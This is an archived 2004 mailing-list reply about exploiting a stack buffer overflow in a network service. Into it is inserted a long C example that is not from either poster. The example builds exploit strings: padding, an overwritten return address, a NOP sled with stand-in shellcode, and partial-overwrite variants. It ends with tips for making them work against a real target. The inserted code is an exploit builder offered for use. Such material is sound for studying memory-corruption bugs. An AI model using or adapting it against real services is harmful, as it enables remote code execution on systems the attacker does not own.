Vulnerability Development mailing list archives
Re: Exploiting network services question
From: James Longstreet <jlongs2 () uic edu>
Date: Sat, 18 Dec 2004 20:56:44 -0600 (CST)
On Mon, 13 Dec 2004 just-a-nick () gmx net wrote:
I have a question regarding the exploitation of network services. If I send the following string to a service ["A"x78]["abcd"][junk - up to 430 bytes] I can control eip with "abcd". How can I exploit this? Is there a good tutorial that I should read? Unfortunately I did not find anything useful with google...
I'm not sure I understand your question. Does the value you put in for eip have to be alphabetic, or is the "abcd" simply notation for "anything I want?" Both are exploitable -- at least theoretically.

If the return address can be anything you want, and if that 430 bytes of junk is also controlled by you, put a payload there. Find out the address of that payload (hint: use gdb), and replace "abcd" with that address.

If it has to be alphabetic, it still may be exploitable. The original return address is probably going to be something in the 0x08xxxxxx range, which is usually where code is. Since 0x08 isn't alphabetic, you can't overflow the whole address. But if you're precise, you can control 1, 2, or 3 bytes of it. See if there's a bit of code in the range that you can set it to that might be fun to execute.
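An added example (not from either poster) that builds the two strings James describes for the ["A"x78]["abcd"][junk] layout: the full 4-byte overwrite pointing EIP into the controlled junk, and the 1 to 3 byte partial overwrite that leaves the original high bytes of the saved EIP in place when only alphabetic input gets through. The 78/430 figures come from the question; PAYLOAD_ADDR, ORIG_EIP and the int3 stand-in for shellcode are hypothetical values chosen for illustration, and eip_after_partial models a 32-bit little-endian x86 stack slot.

```c
/*
 * Added example, not code from the thread.  Assembles the exploit strings
 * described in the reply above.  PAYLOAD_ADDR and ORIG_EIP are hypothetical:
 * in practice you read both out of gdb for the target you are attacking.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN   78    /* "A" bytes before the saved return address (from the question) */
#define JUNK_MAX  430   /* bytes the service accepts after it (from the question) */

#define PAYLOAD_ADDR 0xbffff5c0u   /* hypothetical: where gdb showed the junk region on the stack */
#define ORIG_EIP     0x08048a3cu   /* hypothetical: original saved EIP, in the 0x08xxxxxx text range */

/* Store v as x86 does: least significant byte first. */
static void pack_le32(uint8_t *out, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* Full overwrite: PAD_LEN 'A's, payload_addr in place of "abcd", then a NOP
 * sled filling the junk region with the shellcode at its end.  Because of
 * the sled, payload_addr only has to land somewhere inside the junk, not on
 * the exact first byte of the shellcode.  Returns the total length, or 0 if
 * the pieces do not fit. */
size_t build_full_overwrite(uint8_t *buf, size_t buflen, uint32_t payload_addr,
                            const uint8_t *shellcode, size_t sc_len, size_t junk_len)
{
    size_t total = PAD_LEN + 4 + junk_len;
    if (junk_len > JUNK_MAX || sc_len > junk_len || total > buflen)
        return 0;
    memset(buf, 'A', PAD_LEN);
    pack_le32(buf + PAD_LEN, payload_addr);
    uint8_t *junk = buf + PAD_LEN + 4;
    memset(junk, 0x90, junk_len - sc_len);              /* NOP sled */
    memcpy(junk + (junk_len - sc_len), shellcode, sc_len);
    return total;
}

/* Partial overwrite: only alphabetic bytes are accepted, so 0x08 can never be
 * written and the whole address cannot be replaced.  Sending PAD_LEN 'A's plus
 * n (1..3) bytes and then stopping replaces only the n low bytes of the saved
 * EIP (little-endian), leaving the high bytes intact.  Returns the EIP the
 * function will really return to, or 0 if n is out of range or a byte is not
 * alphabetic. */
uint32_t eip_after_partial(uint32_t orig_eip, const uint8_t *bytes, size_t n)
{
    if (n < 1 || n > 3)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalpha(bytes[i]))
            return 0;
    uint32_t eip = orig_eip;
    for (size_t i = 0; i < n; i++) {
        eip &= ~(0xffu << (8 * i));            /* clear low byte i */
        eip |= (uint32_t)bytes[i] << (8 * i);  /* replace it with what we sent */
    }
    return eip;
}

/* The string that produces that partial overwrite on the wire. */
size_t build_partial_overwrite(uint8_t *buf, size_t buflen, const uint8_t *bytes, size_t n)
{
    if (n < 1 || n > 3 || PAD_LEN + n > buflen)
        return 0;
    memset(buf, 'A', PAD_LEN);
    memcpy(buf + PAD_LEN, bytes, n);
    return PAD_LEN + n;
}

int main(void)
{
    uint8_t buf[PAD_LEN + 4 + JUNK_MAX];
    /* Constructed stand-in for real shellcode: four int3s, so a debugger shows it ran. */
    static const uint8_t shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

    size_t n = build_full_overwrite(buf, sizeof buf, PAYLOAD_ADDR,
                                    shellcode, sizeof shellcode, JUNK_MAX);
    printf("full overwrite: %zu bytes, EIP on the wire:", n);
    for (int i = 0; i < 4; i++)
        printf(" %02x", buf[PAD_LEN + i]);
    printf("\n");

    const uint8_t low[] = { 'a', 'b' };        /* alphabetic, so it survives the filter */
    printf("partial overwrite: saved EIP 0x%08x becomes 0x%08x\n",
           ORIG_EIP, eip_after_partial(ORIG_EIP, low, 2));
    return 0;
}
```

Two things to check before trusting either string against a real target: the stack address you read from gdb shifts with environment size and argv, so the sled is what absorbs that drift, and if the vulnerable copy is strcpy-style it appends a NUL after your last byte, which zeroes the next byte of the saved EIP and changes which addresses a partial overwrite can reach.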
Current thread:
- Exploiting network services question just-a-nick (Dec 13)
- <Possible follow-ups>
- Re: Exploiting network services question Vade 79 (Dec 13)
- Re: Exploiting network services question James Longstreet (Dec 21)
- Re: Exploiting network services question just-a-nick (Dec 23)
- Re: Exploiting network services question James Longstreet (Dec 27)